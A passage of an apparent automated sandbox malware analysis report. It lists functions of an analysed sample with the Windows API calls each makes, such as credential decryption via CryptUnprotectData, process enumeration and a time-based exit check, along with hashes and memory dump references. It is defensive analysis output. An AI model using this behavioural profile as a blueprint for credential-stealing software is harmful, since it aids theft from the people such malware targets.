                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %,}w$8OX$RuP3$UZ7y$fXw$r}z
                                    • API String ID: 0-582109498
                                    • Opcode ID: 979cbf466dd48031069ce682e3978ded3d7d42aad80f261ff0681c5c3238dbba
                                    • Instruction ID: 508c5d1e504e0a81ff3d04dfe27ce1d9bc1f8398af24e5d1b2365c9659b8a14b
                                    • Opcode Fuzzy Hash: 979cbf466dd48031069ce682e3978ded3d7d42aad80f261ff0681c5c3238dbba
                                    • Instruction Fuzzy Hash: ECB228F36086049FE704AE2DEC8567AFBE6EFD4220F1A853DEAC4C3744E63558058697
                                    Function 000C2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 000C2C42
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C2C49
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 000C2C58
                                    • wsprintfA.USER32 ref: 000C2C83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: ae0c52f9ff6751cf55f3d876fce4dd7088b5f86ab8e025efde5d418f695d6bb1
                                    • Instruction ID: afa430124b1b28a29f199cd200a649b5c5e721c3b33368dc40094770953d3a82
                                    • Opcode Fuzzy Hash: ae0c52f9ff6751cf55f3d876fce4dd7088b5f86ab8e025efde5d418f695d6bb1
                                    • Instruction Fuzzy Hash: C301DF71E00604ABCB189B58EC4EF6EBB69EB84721F00432AF9169B6C0D7741D008AE1
                                    Function 0045C951 Relevance: 7.9, Strings: 5, Instructions: 1630COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fvo$"L.i$W36w$v_{$|c=
                                    • API String ID: 0-3770595245
                                    • Opcode ID: f70964eb7978e28d041ad02babf26aedb2130bce1dd1a371ea2104e101d8cbb3
                                    • Instruction ID: bfd3b5b66fbe8c73bed15275875fbb0f2ddc9c20d822200a27f1031c12c68a73
                                    • Opcode Fuzzy Hash: f70964eb7978e28d041ad02babf26aedb2130bce1dd1a371ea2104e101d8cbb3
                                    • Instruction Fuzzy Hash: A8B215F36082049FE304AE2DEC8567AFBE5EF94220F164A3DEAC5C7744E63598058797
                                    Function 00454105 Relevance: 7.8, Strings: 5, Instructions: 1598COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3Bot$7_=$@HWE$Bn$O=
                                    • API String ID: 0-1397858828
                                    • Opcode ID: 8edf2483fe671f3278489c0443fb8cae3a7f8928231a4865ed1494338f873e9b
                                    • Instruction ID: 9da62bc75859ae178adf6dbc65440738f9a4dbd420449376faab08bf0f52842f
                                    • Opcode Fuzzy Hash: 8edf2483fe671f3278489c0443fb8cae3a7f8928231a4865ed1494338f873e9b
                                    • Instruction Fuzzy Hash: 6BA209F360C204AFE3046E2DEC8577AB7D9EF94320F16863DEAC4C7744EA7598058696
                                    Function 000C1B20 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 000C1B72
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C184F
                                      • Part of subcall function 000C1820: lstrlen.KERNEL32(00E56198), ref: 000C1860
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C1887
                                      • Part of subcall function 000C1820: lstrcat.KERNEL32(00000000,00000000), ref: 000C1892
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C18C1
                                      • Part of subcall function 000C1820: lstrlen.KERNEL32(000D4FA0), ref: 000C18D3
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C18F4
                                      • Part of subcall function 000C1820: lstrcat.KERNEL32(00000000,000D4FA0), ref: 000C1900
                                      • Part of subcall function 000C1820: lstrcpy.KERNEL32(00000000,00000000), ref: 000C192F
                                    • sscanf.NTDLL ref: 000C1B9A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C1BB6
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 000C1BC6
                                    • ExitProcess.KERNEL32 ref: 000C1BE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
                                    • Opcode ID: 862c37a781c6468d4ac94929a677811c3b803091013de9de998ab574cdf75a88
                                    • Instruction ID: c68d6785eecbd93c8185d23785f09ee37109af2953747caaaef2b94d19532285
                                    • Opcode Fuzzy Hash: 862c37a781c6468d4ac94929a677811c3b803091013de9de998ab574cdf75a88
                                    • Instruction Fuzzy Hash: 3221F7B1518301AF8350EF69E88499FBBF8FFD9215F404A1EF599C3220E730D9048BA2
                                    Function 000A7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000A775E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A7765
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000A778D
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 000A77AD
                                    • LocalFree.KERNEL32(?), ref: 000A77B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: e839849d1012413a2eb18f11e7b8cfb85d644b2ec2a19fcbb54a3e2410be08ce
                                    • Instruction ID: c36f23ad9f6ebc183aedd53b7bed4ebbf14f3244ff8a2b391d8540806c781434
                                    • Opcode Fuzzy Hash: e839849d1012413a2eb18f11e7b8cfb85d644b2ec2a19fcbb54a3e2410be08ce
                                    • Instruction Fuzzy Hash: 49011E75B41318BBEB10DB94EC4AFAA7B78EB44B11F104159FA09EA2C0D6B0AD40CB90
                                    Function 000C3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C3A96
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C3AA9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C3ABF
                                      • Part of subcall function 000C7310: lstrlen.KERNEL32(------,000A5BEB), ref: 000C731B
                                      • Part of subcall function 000C7310: lstrcpy.KERNEL32(00000000), ref: 000C733F
                                      • Part of subcall function 000C7310: lstrcat.KERNEL32(?,------), ref: 000C7349
                                      • Part of subcall function 000C7280: lstrcpy.KERNEL32(00000000), ref: 000C72AE
                                    • CloseHandle.KERNEL32(00000000), ref: 000C3BF7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 57c8708e02c6bed025c6804ddcaee43fc4e57247ccd80ded0c1bf450383ab6e9
                                    • Instruction ID: a0381d572573cc6f8d06b06f134f9d25e430f907833dbc3b5c0ae34c7a2ee4de
                                    • Opcode Fuzzy Hash: 57c8708e02c6bed025c6804ddcaee43fc4e57247ccd80ded0c1bf450383ab6e9
                                    • Instruction Fuzzy Hash: 0581DF30915215CFC764CF18D988B99B7E1BB45329F29C1AEE4089B2A2D7769D82CF80
                                    Function 000AEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 000AEA76
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 000AEA7E
                                    • lstrcat.KERNEL32(000CCFEC,000CCFEC), ref: 000AEB27
                                    • lstrcat.KERNEL32(000CCFEC,000CCFEC), ref: 000AEB49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 6fe457633d1cf4b36d320925619635b4f0001f3682331504810f80e1464314b3
                                    • Instruction ID: db73dcd7fff4482b7c5d6bfc67240444c099cbd2cf2602d723374c755279487d
                                    • Opcode Fuzzy Hash: 6fe457633d1cf4b36d320925619635b4f0001f3682331504810f80e1464314b3
                                    • Instruction Fuzzy Hash: CC31C175E11219ABDB109B98EC49FEFB7799B44705F04417AFA09E7280DBB05A048BA1
                                    Function 000C40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 000C40CD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000C40DC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C40E3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 000C4113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: 1e5d2a8c0925944718bdef6c36cd0942e599f50b7cad62e57a0a7cfd8c7078a0
                                    • Instruction ID: cbb0ee7abdbffb239eced40bcf09a5ca93c66e3eb9d29a62f2d574b14cd7f412
                                    • Opcode Fuzzy Hash: 1e5d2a8c0925944718bdef6c36cd0942e599f50b7cad62e57a0a7cfd8c7078a0
                                    • Instruction Fuzzy Hash: 2A011A70A01205BBDB109FA5EC99FAABBADEF85311F108159BE0987240DA719D40CBA4
                                    Function 000A9B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000A9B3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000A9B4A
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000A9B61
                                    • LocalFree.KERNEL32 ref: 000A9B70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: f5cf04dc6f3f3a7108866edd13ca58d52a0560109c7e921021977e9ea992771d
